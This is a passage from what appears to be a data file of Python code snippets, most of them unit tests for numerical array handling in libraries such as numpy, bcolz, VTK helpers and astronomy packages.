sys.argv.append('--Numeric')\n from . import numpytools as N\n verify(N)\n sys.argv[-1] = '--numarray'\n reload(N)\n verify(N)\n sys.argv[-1] = '--numpy'\n reload(N)\n verify(N)", "def test_op_isub_array_float(self):\n\n device = pymic.devices[0]\n stream = device.get_default_stream()\n a = numpy.arange(1, 4711 * 1024, dtype=float)\n o = a + 1.3\n\n old_a = numpy.empty_like(a)\n old_o = numpy.empty_like(o)\n old_a[:] = a[:]\n old_o[:] = o[:]\n expect = a - o\n\n offl_a = stream.bind(a)\n offl_o = stream.bind(o)\n offl_a -= o\n offl_a.update_host()\n r = offl_a.array\n stream.sync()\n\n self.assertTrue((r != old_a).all(),\n \"Array operand must be modified: \"\n \"{0} should be {1}\".format(a, old_a))\n self.assertTrue((o == old_o).all(),\n \"Input array operand 2 must not be modified: \"\n \"{0} should be {1}\".format(o, old_o))\n self.assertTrue((r == expect).all(),\n \"Array contains unexpected values: \"\n \"{0} should be {1}\".format(r, expect))", "def __call__(self, par_dict: dict) -> np.ndarray:", "def test_ndarray_copy(self):\r\n assert copy(numpy.ndarray) is numpy.ndarray\r\n assert deepcopy(numpy.ndarray) is numpy.ndarray", "def test01(self):\n a = np.arange(3, self.N)\n ac = bcolz.arange(3, self.N, rootdir=self.rootdir)\n self.assertTrue(np.all(a == ac))", "def test03(self):\n a = np.arange(self.N, dtype=\"i1\")\n ac = bcolz.arange(self.N, dtype=\"i1\", rootdir=self.rootdir)\n self.assertTrue(np.all(a == ac))", "def numpy_extension():\n jsonpickle.ext.numpy.register_handlers()\n yield # control to the test function.\n jsonpickle.ext.numpy.unregister_handlers()", "def test06(self):\n dtype = np.dtype(\"object\")\n a = np.array([\"ale\", \"e\", \"aco\"], dtype=dtype)\n ac = bcolz.carray(a, dtype=dtype)\n self.assertEqual(ac.dtype, dtype)\n self.assertEqual(a.dtype, ac.dtype)\n assert_array_equal(a, ac, \"Arrays are not equal\")", "def test_array_spec_no_match():\n fcode = \"call hello()\"\n with pytest.raises(NoMatchError):\n Fortran2003.Ac_Spec(fcode)", "def test_TimeArray_init_int64():\r\n time = ts.TimeArray(np.int64(1))\r\n npt.assert_equal(time.__repr__(), '1.0 s')\r\n\r\n pass", "def test_equal13():\n x = np.array([[[[[[True, False, True], [True, False, True], [True, False, True]]]]]])\n y = np.array([[True, False, True], [True, False, True], [True, False, True]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_dtype_cache(self):\r\n\r\n start, stop, step = iscalars('start', 'stop', 'step')\r\n out1 = arange(start, stop, step)\r\n out2 = arange(start, stop, step, dtype=out1.dtype)\r\n out3 = arange(start, stop, 2., dtype=out1.dtype)\r\n out4 = arange(start, stop, 2.)\r\n\r\n assert out1.owner.op is out2.owner.op\r\n assert out2.owner.op is out3.owner.op\r\n assert out3.owner.op is not out4.owner.op", "def test_equal14():\n x = np.array([[[[[[True, False, True], [True, False, True], [True, False, True]]]]]])\n y = np.array([[True, False, True], [True, False, True], [True, False, True]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test__chk_asarray(self):\r\n\r\n exp = (array([[1, 1, 1, 1], [2, 2, 2, 2], [3, 3, 3, 3]]), 0)\r\n obs = _chk_asarray([[1, 1, 1, 1], [2, 2, 2, 2], [3, 3, 3, 3]], 0)\r\n assert_almost_equal(obs[0], exp[0])\r\n self.assertEqual(obs[1], exp[1])", "def test_array_storage(self):\n for array_idx in range(5):\n cum_time_array = [0, 0, 0, 0, 0]\n max_time_array = [(0, ''), (0, ''), (0, ''), (0, ''), (0, '')]\n MockDatetimeNow.RETURN_VALUES = [datetime(1970, 1, 1, 0, 0, 0, 0),\n datetime(1970, 1, 1, 0, 0, 4, 200000)]\n MockDatetimeNow.CURRENT_IDX = 0\n with self.subTest(array_idx=array_idx), patch('mpire.utils.datetime', new=MockDatetimeNow), \\\n TimeIt(cum_time_array, array_idx, max_time_array):\n pass\n self.assertListEqual([t for idx, t in enumerate(cum_time_array) if idx != array_idx], [0, 0, 0, 0])\n self.assertListEqual([t for idx, t in enumerate(max_time_array) if idx != 2],\n [(0, ''), (0, ''), (0, ''), (0, '')])\n self.assertEqual(cum_time_array[array_idx], 4.2)\n self.assertGreaterEqual(max_time_array[2], (4.2, None))", "def test_good_array(self):\n # Setup test\n filename = os.path.join(_SAMPLE_FILES_DIR, \"reg_good_ddt_array.xml\")\n out_name = \"physics_types_ddt_array\"\n out_source_name = out_name + '.F90'\n out_meta_name = out_name + '.meta'\n in_source = os.path.join(_SAMPLE_FILES_DIR, out_source_name)\n in_meta = os.path.join(_SAMPLE_FILES_DIR, out_meta_name)\n out_source = os.path.join(_TMP_DIR, out_source_name)\n out_meta = os.path.join(_TMP_DIR, out_meta_name)\n remove_files([out_source, out_meta])\n # Run dycore\n retcode, files = gen_registry(filename, 'se', {}, _TMP_DIR, 2,\n _SRC_MOD_DIR, _CAM_ROOT,\n loglevel=logging.ERROR,\n error_on_no_validate=True)\n # Check return code\n amsg = \"Test failure: retcode={}\".format(retcode)\n self.assertEqual(retcode, 0, msg=amsg)\n flen = len(files)\n amsg = \"Test failure: Found {} files, expected 1\".format(flen)\n self.assertEqual(flen, 1, msg=amsg)\n amsg = \"{} does not exist\".format(out_meta)\n self.assertTrue(os.path.exists(out_meta), msg=amsg)\n amsg = \"{} does not exist\".format(out_source)\n self.assertTrue(os.path.exists(out_source), msg=amsg)\n # For each output file, make sure it matches input file\n amsg = \"{} does not match {}\".format(in_meta, out_meta)\n self.assertTrue(filecmp.cmp(in_meta, out_meta,\n shallow=False), msg=amsg)\n amsg = \"{} does not match {}\".format(in_source, out_source)\n self.assertTrue(filecmp.cmp(in_source, out_source,\n shallow=False), msg=amsg)", "def test_override_symbol(self):\n i, j, k, l = dimify('i j k l')\n a = symbol(name='a', dimensions=(i, j, k, l), value=2.)\n a1 = symbol(name='a1', dimensions=(i, j, k, l), value=3.)\n a2 = symbol(name='a2', dimensions=(i, j, k, l), value=4.)\n op = Operator(Eq(a, a + 3))\n op()\n op(a=a1)\n op(a=a2)\n shape = [d.size for d in [i, j, k, l]]\n\n assert(np.allclose(a.data, np.zeros(shape) + 5))\n assert(np.allclose(a1.data, np.zeros(shape) + 6))\n assert(np.allclose(a2.data, np.zeros(shape) + 7))", "def test_Sobol_G_raises_error_if_values_not_numpy_array():\n fixture = [list(range(8)), str(12345678)]\n for x in fixture:\n with raises(TypeError):\n evaluate(x)", "def test_of_agreement(self): \n \n pop_t = world.pop_t \n pop_sub = world.pop_sub \n \n \n Ns = world.subtime.length\n \n dt = world.time.step\n ds = world.subtime.step\n N = round(ds/dt)\n for i in range(Ns):\n numpy.testing.assert_allclose(pop_sub[:,i],pop_t[i*N,:])", "def state_array_spec(self) -> Dict[str, Any]:", "def test_32_test_not_init_array(self):\n example = Example(groups=7, origins=5,\n init_arrays=False, threading=False)\n with pytest.raises(AttributeError):\n print(example.not_initialized_ij)", "def test_32_test_not_init_array(self):\n example = Example(groups=7, origins=5,\n init_arrays=False, threading=False)\n with pytest.raises(AttributeError):\n print(example.not_initialized_ij)", "def __call__(self, array, axis=None):\n raise NotImplementedError()", "def test_reconstruction_against_simulation(subarray_and_event_gamma_off_axis_500_gev):\n\n # 4-LST bright event already calibrated\n # we'll clean it and parametrize it again in the TelescopeFrame\n subarray, event = subarray_and_event_gamma_off_axis_500_gev\n\n # define reconstructor\n reconstructor = HillasReconstructor(subarray)\n\n hillas_dict = {}\n telescope_pointings = {}\n\n for tel_id, dl1 in event.dl1.tel.items():\n\n telescope_pointings[tel_id] = SkyCoord(\n alt=event.pointing.tel[tel_id].altitude,\n az=event.pointing.tel[tel_id].azimuth,\n frame=AltAz(),\n )\n\n geom_CameraFrame = subarray.tel[tel_id].camera.geometry\n\n # this could be done also out of this loop,\n # but in case of real data each telescope would have a\n # different telescope_pointing\n geom_TelescopeFrame = geom_CameraFrame.transform_to(\n TelescopeFrame(telescope_pointing=telescope_pointings[tel_id])\n )\n\n mask = tailcuts_clean(\n geom_TelescopeFrame,\n dl1.image,\n picture_thresh=5.0,\n boundary_thresh=2.5,\n keep_isolated_pixels=False,\n min_number_picture_neighbors=2,\n )\n\n try:\n hillas_dict[tel_id] = hillas_parameters(\n geom_TelescopeFrame[mask], dl1.image[mask]\n )\n\n # the original event is created from a\n # pytest fixture with \"session\" scope, so it's always the same\n # and if we used the same event we would overwrite the image\n # parameters for the next tests, thus causing their failure\n test_event = deepcopy(event)\n test_event.dl1.tel[tel_id].parameters = ImageParametersContainer()\n test_event.dl1.tel[tel_id].parameters.hillas = hillas_dict[tel_id]\n\n except HillasParameterizationError as e:\n print(e)\n continue\n\n # Get shower geometry\n reconstructor(event)\n # get the result from the correct DL2 container\n result = event.dl2.stereo.geometry[\"HillasReconstructor\"]\n\n # get the reconstructed coordinates in the sky\n reco_coord = SkyCoord(alt=result.alt, az=result.az, frame=AltAz())\n # get the simulated coordinates in the sky\n true_coord = SkyCoord(\n alt=event.simulation.shower.alt, az=event.simulation.shower.az, frame=AltAz()\n )\n\n # check that we are not more far than 0.1 degrees\n assert reco_coord.separation(true_coord) < 0.1 * u.deg", "def setUp(self):\n def compare_numpy_ndarrays(x, y, msg=None):\n if not (x == y).all():\n message = \"Arrays are not equal ({} entries differ)\" \\\n .format(np.count_nonzero(x - y))\n if msg is not None:\n message += \", \"+msg\n raise self.failureException(message)\n self.addTypeEqualityFunc(np.ndarray, compare_numpy_ndarrays)", "def test_get_flag_array_no_squeeze():\n test_file = os.path.join(DATA_PATH, \"paper_test_file.uvh5\")\n test_uv = UVData()\n test_uv.read(test_file)\n\n baseline_array = np.array(list(set(test_uv.baseline_array)))\n flag_array = utils.get_flag_array(test_uv, reds=baseline_array, squeeze=False)\n\n test_flags = np.zeros(\n (test_uv.Npols, test_uv.Nbls, test_uv.Ntimes, test_uv.Nfreqs),\n dtype=np.float32,\n )\n\n pol_array = uvutils.polnum2str(test_uv.polarization_array)\n for pol_cnt, pol in enumerate(pol_array):\n for cnt, baseline in enumerate(list(set(test_uv.baseline_array))):\n ant_1, ant_2 = test_uv.baseline_to_antnums(baseline)\n test_flags[pol_cnt, cnt] = test_uv.get_flags(ant_1, ant_2)\n\n assert np.all(test_flags == flag_array)", "def check_array(self, v, t):\n raise NotImplementedError('check_array')", "def test_op_sub_array_float(self):\n\n device = pymic.devices[0]\n stream = device.get_default_stream()\n a = numpy.arange(1.0, 4711.0 * 1024, dtype=float)\n o = a + 1.0\n\n old_a = numpy.empty_like(a)\n old_o = numpy.empty_like(o)\n old_a[:] = a[:]\n old_o[:] = o[:]\n expect = a - o\n\n offl_a = stream.bind(a)\n offl_r = offl_a - o\n offl_a.update_host()\n r = offl_r.update_host().array\n stream.sync()\n\n self.assertEqual(r.shape, a.shape)\n self.assertEqual(r.dtype, a.dtype)\n self.assertTrue((a == old_a).all(),\n \"Input array operand 1 must not be modified: \"\n \"{0} should be {1}\".format(a, old_a))\n self.assertTrue((o == old_o).all(),\n \"Input array operand 2 must not be modified: \"\n \"{0} should be {1}\".format(o, old_o))\n self.assertTrue((r == expect).all(),\n \"Array contains unexpected values: \"\n \"{0} should be {1}\".format(r, expect))", "def test_get_flag_array():\n test_file = os.path.join(DATA_PATH, \"paper_test_file.uvh5\")\n test_uv = UVData()\n test_uv.read(test_file)\n\n baseline_array = np.array(list(set(test_uv.baseline_array)))\n flag_array = utils.get_flag_array(test_uv, reds=baseline_array)\n\n test_flags = np.zeros(\n (test_uv.Npols, test_uv.Nbls, test_uv.Ntimes, test_uv.Nfreqs),\n dtype=np.float32,\n )\n\n pol_array = uvutils.polnum2str(test_uv.polarization_array)\n for pol_cnt, pol in enumerate(pol_array):\n for cnt, baseline in enumerate(list(set(test_uv.baseline_array))):\n ant_1, ant_2 = test_uv.baseline_to_antnums(baseline)\n test_flags[pol_cnt, cnt] = test_uv.get_flags(ant_1, ant_2)\n\n test_flags = np.squeeze(test_flags, axis=0)\n assert np.all(test_flags == flag_array)", "def __array_interface__(self):\n ...", "def __array_interface__(self):\n ...", "def test02(self):\n dtype = np.dtype(\"f4,f8\")\n a = np.ones(30000, dtype=dtype)\n ac = bcolz.carray(a, dtype=dtype)\n self.assertTrue(ac.dtype == dtype)\n self.assertTrue(a.dtype == ac.dtype)\n # print \"ac-->\", `ac`\n assert_array_equal(a, ac[:], \"Arrays are not equal\")", "def test_asarraylike_array():\n arr = np.array([1, 2, 3, 4])\n result = util.asarraylike(arr)\n\n assert result is arr", "def test_jitable_funcs(self):\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(\n 1.0, Array(np.array([[0.2, 0.4], [0.6, 0.8]]))\n )\n\n self.basic_lindblad.rotating_frame = None\n\n self.basic_lindblad.evaluation_mode = \"dense_vectorized\"\n\n self.jit_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(1.0, Array(np.array([0.2, 0.4, 0.6, 0.8])))\n\n self.basic_lindblad.rotating_frame = Array(np.array([[3j, 2j], [2j, 0]]))\n\n self.jit_wrap(self.basic_lindblad.evaluate)(1.0)\n self.jit_wrap(self.basic_lindblad.evaluate_rhs)(1.0, Array(np.array([0.2, 0.4, 0.6, 0.8])))\n\n self.basic_lindblad.rotating_frame = None", "def test_invalid_events(subarray_and_event_gamma_off_axis_500_gev):\n\n # 4-LST bright event already calibrated\n # we'll clean it and parametrize it again in the TelescopeFrame\n subarray, event = subarray_and_event_gamma_off_axis_500_gev\n\n tel_azimuth = {}\n tel_altitude = {}\n\n #source = EventSource(filename, max_events=1)\n #subarray = source.subarray\n calib = CameraCalibrator(subarray)\n fit = HillasReconstructor(subarray)\n\n #for event in source:\n\n calib(event)\n\n hillas_dict = {}\n for tel_id, dl1 in event.dl1.tel.items():\n\n geom = subarray.tel[tel_id].camera.geometry\n tel_azimuth[tel_id] = event.pointing.tel[tel_id].azimuth\n tel_altitude[tel_id] = event.pointing.tel[tel_id].altitude\n\n mask = tailcuts_clean(\n geom, dl1.image, picture_thresh=10.0, boundary_thresh=5.0\n )\n\n dl1.parameters = ImageParametersContainer()\n\n try:\n moments = hillas_parameters(geom[mask], dl1.image[mask])\n hillas_dict[tel_id] = moments\n dl1.parameters.hillas = moments\n except HillasParameterizationError:\n dl1.parameters.hillas = HillasParametersContainer()\n continue\n\n # copy event container to modify it\n event_copy = deepcopy(event)\n # overwrite all image parameters but the last one with dummy ones\n for tel_id in list(event_copy.dl1.tel.keys())[:-1]:\n event_copy.dl1.tel[tel_id].parameters.hillas = HillasParametersContainer()\n fit(event_copy)\n assert event_copy.dl2.stereo.geometry[\"HillasReconstructor\"].is_valid is False\n\n # Now use the original event, but overwrite the last width to 0\n event.dl1.tel[tel_id].parameters.hillas.width = 0 * u.m\n fit(event)\n assert event.dl2.stereo.geometry[\"HillasReconstructor\"].is_valid is False\n\n # Now use the original event, but overwrite the last width to NaN\n event.dl1.tel[tel_id].parameters.hillas.width = np.nan * u.m\n fit(event)\n assert event.dl2.stereo.geometry[\"HillasReconstructor\"].is_valid is False", "def test04(self):\n a = np.array([\"ale\", \"e\", \"aco\"], dtype=\"S4\")\n ac = bcolz.carray(a, dtype='S4')\n self.assertTrue(ac.dtype == np.dtype('S4'))\n self.assertTrue(a.dtype == ac.dtype)\n # print \"ac-->\", `ac`\n assert_array_equal(a, ac, \"Arrays are not equal\")", "def test_equal7():\n x = randtool(\"float\", -10, 10, [3, 3, 1])\n y = randtool(\"float\", -10, 10, [3, 3, 3, 1])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_observed_species(self):\n c = array([4,3,4,0,1,0,2])\n obs = observed_species(c)\n exp = 5\n self.assertEqual(obs, exp)\n c = array([0,0,0])\n obs = observed_species(c)\n exp = 0\n self.assertEqual(obs, exp)\n self.assertEqual(observed_species(self.TestData), 9)", "def a_subarray_in_the_idle_state():", "def test_equal11():\n x = np.array([[True, False, True]])\n y = np.array([[[[[True, False, True], [True, False, True], [True, False, True]]]]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test10(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a, rootdir=self.rootdir), b\n c[\"a + 2 * d - 3 > 1000\"] = 0\n a[(a + 2 * b - 3) > 1000] = 0\n # print \"carray ->\", c\n # print \"numpy ->\", a\n assert_array_equal(c[:], a, \"carray[expr] = v does not work correctly\")", "def test_method_reference_from_array_type(self):\n self.assert_contains_method_reference_expression_in_m(\n parse.parse(setup_java_class(\"int[]::new;\")))", "def test_equal10():\n x = np.array([[True, False, True], [True, False, True], [True, False, True]])\n y = np.array([[True, False, True]])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_run_a_scan_on_sdp_subarray_in_low():", "def test_equal9():\n x = np.array([[True, False, True], [True, False, True], [True, False, True]])\n y = np.array([True, False, True])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_simple(self):\n with self.subTest(\"from np array\"):\n data = np.random.rand(10, 4)\n mask = np.ones((10, 4))\n channels = [\"a\", \"b\", \"c\", \"d\"]\n fcs.FCSData((data, mask), channels=channels)", "def test_pyarma_wrapper(self):\n v = get_static_vec()\n assert np.all(v==np.zeros(3))\n assert v.flags['F_CONTIGUOUS']\n assert not v.flags['OWNDATA']", "def test_exception_method_not_implemented(local_registry, numpy_array, method):\n q = local_registry.Quantity(numpy_array, units_)\n\n exctruth = (\n f\"Method {method} only implemented for objects of\"\n \" <class 'dask.array.core.Array'>, not\"\n \" <class 'numpy.ndarray'>\"\n )\n with pytest.raises(AttributeError, match=exctruth):\n obj_method = getattr(q, method)\n obj_method()", "def test07(self):\n a, b = np.arange(self.N), np.arange(1, self.N+1)\n c, d = bcolz.carray(a, rootdir=self.rootdir), b\n cr = c[\"a + 2 * d - 3 > 0\"]\n nr = a[(a + 2 * b - 3) > 0]\n # print \"ca[expr] ->\", cr\n # print \"numpy ->\", nr\n assert_array_equal(cr[:], nr, \"carray[expr] does not work correctly\")", "def check_array_pointer(self, register: str, value: List[int]):\n assert self._call is not None, f\"You must first call a function before checking its return values!\"\n \"\"\" Checks that when this function is called, we have not already assembled and run the test. \"\"\"\n assert not self._has_executed, f\"Test has already been assembled and run!\"\n assert len(value) > 0, \"Array to compare against has to contain at least one element.\"\n saved_register = self._parse_register(register)\n array_name = f\"array pointed to by {register}\"\n expected = self.array(value).name\n actual = f\"mv a2 {saved_register}\"\n self._compare_int_array(array_name, actual, expected, value, exit_code = 2)", "def test_zero_to_one_element(self):\n\n f = Foo()\n f.a = numpy.zeros((2,), float)\n f.event_fired = False\n\n # Change the array.\n f.a = numpy.concatenate((f.a, numpy.array([100])))\n\n # Confirm that the static trait handler was invoked.\n self.assertEqual(f.event_fired, True)\n\n return", "def test_surrogate_array():\n # We can't use random positions, as the positions have to be\n # far-enough not to overlap.\n pos = np.array([[ 2, 10],\n [10, 4],\n [80, 30],\n [40, 60],\n [90, 70]])\n ampli = np.random.random(5)\n data = make_surrogate_array(nbsubj=1, noise_level=0, spatial_jitter=0,\n signal_jitter=0, pos=pos, dimx=100,\n dimy=100, ampli=ampli).squeeze()\n x, y = pos.T\n np.testing.assert_array_equal(data[x, y], ampli)", "def test_overplotting(self):\n arr = self.arr\n out = ternary(arr)\n self.assertTrue(hasattr(out, \"tax\"))\n out2 = ternary(arr, ax=out)\n self.assertTrue(out.tax is out2.tax) # hasn't added a new ternary axis", "def __init__(self, strict=True):\n self.strict = strict\n self.testwithoutnp = test_without_numpy()", "def with_numpy(func):\r\n def my_func():\r\n raise nose.SkipTest('Test requires numpy')\r\n return my_func", "def test_arr2cell_array(self):\n # Test list of lists.\n a = [[0], [1, 2], [3, 4, 5], [6, 7, 8, 9]]\n cells = array_handler.array2vtkCellArray(a)\n z = numpy.array([1, 0, 2, 1,2, 3, 3,4,5, 4, 6,7,8,9])\n arr = array_handler.vtk2array(cells.GetData())\n self.assertEqual(numpy.sum(arr - z), 0)\n self.assertEqual(len(arr.shape), 1)\n self.assertEqual(len(arr), 14)\n\n # Test if optional argument stuff also works.\n cells = vtk.vtkCellArray()\n ident = id(cells)\n cells = array_handler.array2vtkCellArray(a, cells)\n self.assertEqual(id(cells), ident)\n arr = array_handler.vtk2array(cells.GetData())\n self.assertEqual(numpy.sum(arr - z), 0)\n self.assertEqual(cells.GetNumberOfCells(), 4)\n\n # Make sure this resets the cell array and does not add to the\n # existing list!\n cells = array_handler.array2vtkCellArray(a, cells)\n self.assertEqual(cells.GetNumberOfCells(), 4)\n\n # Test Numeric array handling.\n N = 3\n a = numpy.zeros((N,3), numpy.int)\n a[:,1] = 1\n a[:,2] = 2\n cells = array_handler.array2vtkCellArray(a)\n arr = array_handler.vtk2array(cells.GetData())\n expect = numpy.array([3, 0, 1, 2]*3, numpy.int) \n self.assertEqual(numpy.alltrue(numpy.equal(arr, expect)),\n True)\n self.assertEqual(cells.GetNumberOfCells(), N)\n\n # Test if a list of Numeric arrays of different cell lengths works.\n l_a = [a[:,:1], a, a[:2,:2]]\n cells = array_handler.array2vtkCellArray(l_a)\n arr = array_handler.vtk2array(cells.GetData())\n expect = numpy.array([1, 0]*3 + [3, 0, 1, 2]*3 + [2, 0,1]*2, numpy.int)\n self.assertEqual(numpy.alltrue(numpy.equal(arr, expect)),\n True)\n self.assertEqual(cells.GetNumberOfCells(), N*2 + 2)\n\n # This should not take a long while. This merely tests if a\n # million cells can be created rapidly.\n N = int(1e6)\n a = numpy.zeros((N,3), numpy.int)\n a[:,1] = 1\n a[:,2] = 2\n cells = array_handler.array2vtkCellArray(a)\n self.assertEqual(cells.GetNumberOfCells(), N)", "def test_deref_array(self):\n sigs = [[['vtkDataArray']],\n [['vtkFloatArray']],\n [['vtkCellArray']],\n [['vtkPoints']],\n [['int', 'vtkIdList']],\n [['int', ('float', 'float'), 'vtkDataArray']],\n [['Prop', 'int', 'vtkDataArray']],\n [['Points', ('float', 'float', 'float')]]\n ]\n args = [[[1,2,3]],\n [[0,0,0]],\n [[[1,2,3],[4,5,6]]],\n [[[0.,0.,0.], [1.,1.,1.]]],\n [1, [1,2,3]],\n [1, (0.0, 0.0), [1.0, 1.0, 1.0]],\n [Prop(), 1, numpy.array([1.0, 1.0, 1.0])],\n [[[1,2,3]], [1,2,3]]\n ]\n r = array_handler.deref_array(args[0], sigs[0])\n self.assertEqual(mysum(array_handler.vtk2array(r[0]) -args[0]), 0)\n r = array_handler.deref_array(args[1], sigs[1])\n self.assertEqual(mysum(array_handler.vtk2array(r[0]) - args[1]), 0)\n\n r = array_handler.deref_array(args[2], sigs[2])\n self.assertEqual(r[0].GetNumberOfCells(), 2)\n \n r = array_handler.deref_array(args[3], sigs[3])\n self.assertEqual(mysum(array_handler.vtk2array(r[0].GetData()) -\n numpy.array(args[3], 'f')), 0)\n \n r = array_handler.deref_array(args[4], sigs[4])\n self.assertEqual(r[0], 1)\n self.assertEqual(r[1].__class__.__name__, 'vtkIdList')\n \n r = array_handler.deref_array(args[5], sigs[5])\n self.assertEqual(r[0], 1)\n self.assertEqual(r[1], (0.0, 0.0))\n self.assertEqual(mysum(array_handler.vtk2array(r[2]) -args[5][2]), 0)\n \n r = array_handler.deref_array(args[6], sigs[6])\n self.assertEqual(r[0].IsA('vtkProperty'), True)\n self.assertEqual(r[1], 1)\n self.assertEqual(mysum(array_handler.vtk2array(r[2]) -args[6][2]), 0)\n\n r = array_handler.deref_array(args[7], sigs[7])", "def test_op_isub_array_int(self):\n\n device = pymic.devices[0]\n stream = device.get_default_stream()\n a = numpy.arange(1, 4711 * 1024, dtype=int)\n o = a + 1\n\n old_a = numpy.empty_like(a)\n old_o = numpy.empty_like(o)\n old_a[:] = a[:]\n old_o[:] = o[:]\n expect = a - o\n\n offl_a = stream.bind(a)\n offl_o = stream.bind(o)\n offl_a -= o\n offl_a.update_host()\n r = offl_a.array\n stream.sync()\n\n self.assertTrue((r != old_a).all(),\n \"Array operand must be modified: \"\n \"{0} should be {1}\".format(a, old_a))\n self.assertTrue((o == old_o).all(),\n \"Input array operand 2 must not be modified: \"\n \"{0} should be {1}\".format(o, old_o))\n self.assertTrue((r == expect).all(),\n \"Array contains unexpected values: \"\n \"{0} should be {1}\".format(r, expect))", "def test_equal6():\n x = randtool(\"float\", -10, 10, [3, 3, 3, 1])\n y = randtool(\"float\", -10, 10, [3, 3, 1])\n res = np.equal(x, y)\n obj.run(res=res, x=x, y=y)", "def test_check_array_t(self):\n with LogCapture() as log:\n log.setLevel(logging.INFO)\n vb = self.ph5validate.check_array_t()\n\n self.assertEqual(log.records[0].msg, \"Validating Array_t\")\n\n self.assertEqual(\n self.ph5validate.das_time,\n {('12183', 1, 500):\n {'max_pickup_time': [1550850187],\n 'time_windows': [(1550849950, 1550850034, '9001'),\n (1550849950, 1550850034, '9001'),\n (1550849950, 1550850034, '9001'),\n (1550850043, 1550850093, '9002'),\n (1550850125, 1550850187, '9003')],\n 'min_deploy_time':\n [1550849950,\n 'Data exists before deploy time: 7 seconds.']}}\n )\n\n self.assertEqual(vb[0].heading,\n '-=-=-=-=-=-=-=-=-\\nStation 9001 Channel 1\\n'\n '2 error, 3 warning, 0 info\\n-=-=-=-=-=-=-=-=-\\n')\n self.assertEqual(vb[0].info, [])\n self.assertEqual(\n vb[0].warning,\n ['No station description found.',\n 'Data exists before deploy time: 7 seconds.',\n 'Station 9001 [1550849950, 1550850034] is repeated 2 time(s)'])\n self.assertEqual(\n vb[0].error,\n ['No Response table found. Have you run resp_load yet?',\n 'Response_t has no entry for n_i=7']\n )\n\n self.assertEqual(vb[1].heading,\n '-=-=-=-=-=-=-=-=-\\nStation 9002 Channel 1\\n'\n '2 error, 2 warning, 0 info\\n-=-=-=-=-=-=-=-=-\\n')\n self.assertEqual(vb[1].info, [])\n self.assertEqual(\n vb[1].warning,\n ['No station description found.',\n 'Data exists after pickup time: 36 seconds.'])\n self.assertEqual(\n vb[1].error,\n ['No Response table found. Have you run resp_load yet?',\n 'Response_t has no entry for n_i=7']\n )\n\n self.assertEqual(vb[2].heading,\n '-=-=-=-=-=-=-=-=-\\nStation 9003 Channel 1\\n'\n '2 error, 2 warning, 0 info\\n-=-=-=-=-=-=-=-=-\\n')\n self.assertEqual(vb[2].info, [])\n self.assertEqual(\n vb[2].warning,\n ['No station description found.',\n 'Data exists after pickup time: 2 seconds.'])\n self.assertEqual(\n vb[2].error,\n ['No Response table found. Have you run resp_load yet?',\n 'Response_t has no entry for n_i=7']\n )", "def test03(self):\n dtype = np.dtype([('f1', [('f1', 'i2'), ('f2', 'i4')])])\n a = np.ones(3000, dtype=dtype)\n ac = bcolz.carray(a, dtype=dtype)\n self.assertTrue(ac.dtype == dtype)\n self.assertTrue(a.dtype == ac.dtype)\n # print \"ac-->\", `ac`\n assert_array_equal(a, ac[:], \"Arrays are not equal\")", "def test07(self):\n types = [np.int8, np.int16, np.int32, np.int64,\n np.uint8, np.uint16, np.uint32, np.uint64,\n np.float16, np.float32, np.float64,\n np.complex64, np.complex128]\n if hasattr(np, 'float128'):\n types.extend([np.float128, np.complex256])\n shapes = [(10,), (10, 10), (10, 10, 10)]\n for shape in shapes:\n for t in types:\n a = bcolz.zeros(shape, t)\n b = bcolz.carray(a)\n self.assertEqual(a.dtype, b.dtype)\n self.assertEqual(a.shape, b.shape)\n self.assertEqual(a.shape, shape)", "def test_float_array_variable(self, parse_input_mocked_metadata):\n bb = parse_input_mocked_metadata(\"float array C =\\n\\t-0.1, 0.2\")\n assert np.all(bb._var[\"C\"] == np.array([[-0.1, 0.2]]))", "def test_obsm_values_ara_numpy(self):\n\n self.validator.adata.obsm[\"X_tsne\"] = pd.DataFrame(\n self.validator.adata.obsm[\"X_umap\"], index=self.validator.adata.obs_names\n )\n self.validator.validate_adata()\n self.assertEqual(\n self.validator.errors,\n [\n \"ERROR: All embeddings have to be of 'numpy.ndarray' type, \"\n \"'adata.obsm['X_tsne']' is <class 'pandas.core.frame.DataFrame'>').\"\n ],\n )", "def array(self):", "def check_array(self, array: ArrayData, value: List[int]):\n assert self._call is not None, f\"You must first call a function before checking its return values!\"\n \"\"\" Checks that when this function is called, we have not already assembled and run the test. \"\"\"\n assert not self._has_executed, f\"Test has already been assembled and run!\"\n assert len(value) > 0, \"Array to compare against has to contain at least one element.\"\n assert len(value) <= len(array), \"Array to compare against must contain a smaller or equal amount of elements.\"\n expected = self.array(value).name\n actual = \"la a2, \" + self._lookup_array(array)\n self._compare_int_array(array.name, actual, expected, value, exit_code = 2)", "def test_assign_resources_to_tmc_subarray_in_low():", "def test_nbands_vrt_array(self):\n self.assertEqual(_test_array(landsat_vrt).shape[0], 2)", "def test04a(self):\n a = np.arange(1e3)\n b = bcolz.carray(a, chunklen=16, rootdir=self.rootdir)\n sl = slice(1, 2)\n # print \"b[sl]->\", `b[sl]`\n assert_array_equal(a[sl], b[sl], \"Arrays are not equal\")", "def test_renderer_works_correctly_with_numpy_array(self):\n data = numpy.array([1])\n rendered = self.renderer.render(\n data=data, media_type=\"application/json\", renderer_context={}\n )\n reloaded = orjson.loads(rendered)\n\n self.assertEqual(reloaded, data)", "def test_shannon(self):\n c = array([5])\n self.assertFloatEqual(shannon(c), 0)\n c = array([5,5])\n self.assertFloatEqual(shannon(c), 1)\n c = array([1,1,1,1,0])\n self.assertEqual(shannon(c), 2)", "def test_allnegative2(self):\n\n slot = 